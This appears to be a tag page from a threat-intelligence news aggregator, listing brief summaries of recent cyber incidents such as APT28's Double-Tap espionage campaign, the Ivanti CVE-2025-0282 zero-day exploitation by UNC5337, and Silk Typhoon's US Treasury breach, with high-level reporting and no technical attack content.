Tag: CHINA

Products and people are in place for CISA to succeed, agency’s departing No. 2 official says
Summary: Nitin Natarajan reflects on his tenure at CISA, highlighting the agency’s growth and key initiatives in cybersecurity, particularly in response to increasing digital threats. As he prepares to transition leadership, he emphasizes the importance of continuity and resilience in protecting U.S. critical infrastructure.

Threat Actor: China-linked hackers | China-linked hackers Victim: U.S.…

Read More
Fancy Bear spotted using real Kazak government documents in spearpishing campaign | CyberScoop
Summary: A Russian-linked hacking group is using legitimate Kazakhstan government documents as phishing lures to deploy malware and spy on officials in Central Asia. This campaign, identified as “Double-Tap,” involves sophisticated malware techniques and targets multiple nations in the region.

Threat Actor: APT 28 (Fancy Bear) | APT 28 Victim: Kazakhstan Government | Kazakhstan Government

Key Point :

The hacking group is leveraging seemingly legitimate documents to infect and spy on government officials.…
Read More
APT28’s New Espionage Campaign Uses Double-Tap Infection Chain
Summary: Security researchers have uncovered a cyber espionage campaign known as the “Double-Tap Campaign,” linked to Russia’s APT28, targeting intelligence collection in Central Asia, particularly Kazakhstan. The campaign utilizes legitimate documents as spearphishing bait, showcasing a sophisticated infection chain involving advanced malware techniques.

Threat Actor: UAC-0063 | APT28 Victim: Kazakhstan | Kazakhstan

Key Point :

The campaign employs a “Double-Tap” technique, using two malicious Word documents to execute commands and deploy the HATVIBE backdoor.…
Read More
Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
This report discusses a cyber espionage campaign linked to the Russian intrusion set UAC-0063, which targets Central Asian countries, particularly Kazakhstan, using weaponized Office documents. The campaign is associated with the APT28 group and aims to collect strategic intelligence concerning Kazakhstan’s diplomatic and economic relations. Affected: Kazakhstan, Ukraine, Israel, India, Kyrgyzstan, Tajikistan

Keypoints :

UAC-0063 is a Russian intrusion set active since at least 2021, targeting various countries.…
Read More
UK domain registry Nominet confirms breach via Ivanti zero-day
Summary: Nominet, the .UK domain registry, confirmed a network breach via an Ivanti VPN zero-day vulnerability, although no evidence of data leakage has been found. The incident has been reported to authorities, and access to systems has been restricted as investigations continue.

Threat Actor: UNC5337 | UNC5337 Victim: Nominet | Nominet

Key Point :

Nominet operates over 11 million domain names and runs the UK’s Protective Domain Name Service.…
Read More
Rep. Don Bacon on cyber deterrence: ‘Speak softly and carry a big-ass stick’
Summary: Rep. Don Bacon discusses his priorities as the head of the House Armed Services cyber and innovation subcommittee, emphasizing the need for a stronger response to cyber threats, particularly from China, and the urgency of modernizing military acquisition processes. He also shares insights on the future of Cyber Command and the importance of maintaining a unified command structure.…
Read More
⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [13 January]
Summary: This week’s cybersecurity recap highlights critical vulnerabilities, ongoing exploits, and legal actions against threat actors, emphasizing the importance of proactive security measures. Staying informed about these threats and implementing protective strategies is essential for individuals and organizations alike.

Threat Actor: UNC5337 | UNC5337 Victim: Ivanti | Ivanti

Key Point :

A critical vulnerability in Ivanti Connect Secure appliances has been exploited as a zero-day, allowing for remote code execution.…
Read More
China Targeted Foreign Investment, Sanctions Offices in Treasury Hack: Reports
Summary: Chinese cyberspies have targeted multiple offices within the US Treasury Department, including those involved with foreign investments and sanctions, in a significant cyberattack. The breach, which has raised concerns about the potential for intelligence gathering, involved accessing unclassified information through compromised systems.

Threat Actor: Chinese cyberspies | Silk Typhoon Victim: US Treasury Department | US Treasury Department

Key Point :

Hackers gained initial access using a compromised API key from BeyondTrust’s remote management service.…
Read More
This article provides a comprehensive overview of significant cybersecurity incidents and vulnerabilities reported recently, including outages, data breaches, and exploits targeting various platforms. Affected: Proton Mail, Ivanti VPN, Banshee, BayMark Health Services, Medusind, MirrorFace, STIIIZY, Samsung, GFI KerioControl, Mitel MiCollab, CrowdStrike, Akamai, Casio.

Keypoints :

Proton Mail experienced a worldwide outage due to a surge in database connections during infrastructure migration.…
Read More
RST TI Report Digest: January 13, 2025
This week’s threat intelligence report from RST Cloud highlights significant cyber threats from various actors, including the Chinese state-sponsored group RedDelta targeting Mongolia, Taiwan, and Southeast Asia, as well as the emergence of new malware like Banshee and the Gayfemboy botnet. The report summarizes key findings from 29 threat intelligence reports, detailing tactics, techniques, and procedures (TTPs) used in these attacks, and includes numerous indicators of compromise (IoCs).…
Read More
Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems
Summary: A cybersecurity operation by watchTowr Labs has successfully hijacked over 4,000 unique web backdoors by taking control of abandoned domains, allowing them to track compromised systems and potentially commandeer them. This initiative highlights vulnerabilities in the infrastructure used by various threat actors, revealing significant oversight in their operations.…
Read More
January 10 Advisory: Actively Exploited Unauthenticated Remote Code Execution in Ivanti Connect Secure CVE-2025-0282
CVE-2025-0282 is a critical stack overflow vulnerability affecting Ivanti network appliances, allowing remote code execution by unauthenticated attackers. Disclosed on January 8, 2025, it has been actively exploited since mid-December 2024. Ivanti and Mandiant are investigating the exploitation, which includes post-exploitation activities like lateral movement and malware deployment.…
Read More
Chinas UNC5337 Exploits a Critical Ivanti RCE Bug, Again
Summary: A Chinese threat actor, UNC5337, is exploiting critical vulnerabilities in Ivanti remote access devices, particularly targeting the Connect Secure and Policy Secure gateways. Despite Ivanti’s efforts to enhance security, the group has successfully deployed sophisticated malware to compromise affected systems.

Threat Actor: UNC5337 | UNC5337 Victim: Ivanti | Ivanti

Key Point :

UNC5337 has exploited CVE-2025-0282, a critical vulnerability allowing code execution without authentication.…
Read More
Treasury hackers also breached US foreign investments review office
Summary: Silk Typhoon, a Chinese state-backed hacking group, has breached multiple offices within the U.S. Treasury Department, targeting systems that review foreign investments and administer sanctions. The attackers aimed to gather intelligence on potential sanctions against Chinese entities by exploiting a stolen API key.

Threat Actor: Silk Typhoon | Silk Typhoon Victim: U.S.…

Read More
In Other News: Bank of America Warns of Data Breach, Trucking Cybersecurity, Treasury Hack Linked to Silk Typhoon
Summary: This week’s cybersecurity news roundup highlights significant developments, including vulnerabilities, data breaches, and geopolitical implications involving major companies and organizations.

Threat Actor: Natohub, Silk Typhoon | Natohub, Silk Typhoon Victim: International Civil Aviation Organization, Bank of America, Green Bay Packers | International Civil Aviation Organization, Bank of America, Green Bay Packers

Key Point :

The US Defense Department has linked Tencent and CATL to the Chinese military.…
Read More